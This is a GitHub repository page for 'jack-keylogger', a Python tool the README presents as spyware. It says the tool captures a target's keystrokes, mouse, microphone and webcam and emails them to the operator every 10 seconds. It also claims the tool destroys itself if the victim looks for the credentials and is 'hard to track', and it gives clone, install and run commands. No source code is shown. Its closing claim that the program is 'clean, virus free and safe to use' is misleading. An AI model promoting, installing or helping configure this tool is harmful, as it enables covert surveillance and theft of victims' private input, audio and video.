Skip to content

a simple keylogger that records hardware inputs like keyboard, mouse, microphone and webcam and sends it to your e-mail.

License

Notifications You must be signed in to change notification settings

krishealty/jack-keylogger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

jack-keylogger

Sends target's hardware data to your email client every 10 seconds (can be changed) and destroys itself if target tries to find the SMTP username and password.

PREREQUISITES

This program supports:

  • Windows
  • Termux
  • Mac os
  • Linux

Note: You need to add your SMTP USERNAME and SMTP PASSWORD of the email client in the file "keylogger.py" before using. (refer below screenshot)

(you can create an email client from "https://mailtrap.io/" using a temp mail.)

INSTALLATION

git clone https://github.com/krishealty/jack-keylogger.git
cd jack-keylogger
pip install -r requirements.txt

USAGE

python3 keylogger.py

FEATURES

  • Get hardware Data from the Target Computer every 10 seconds.
  • The program will destroy itself if the target tries to find the email client.
  • Hard to track.

ANTIVIRUS TEST

Program is clean, virus free and safe to use.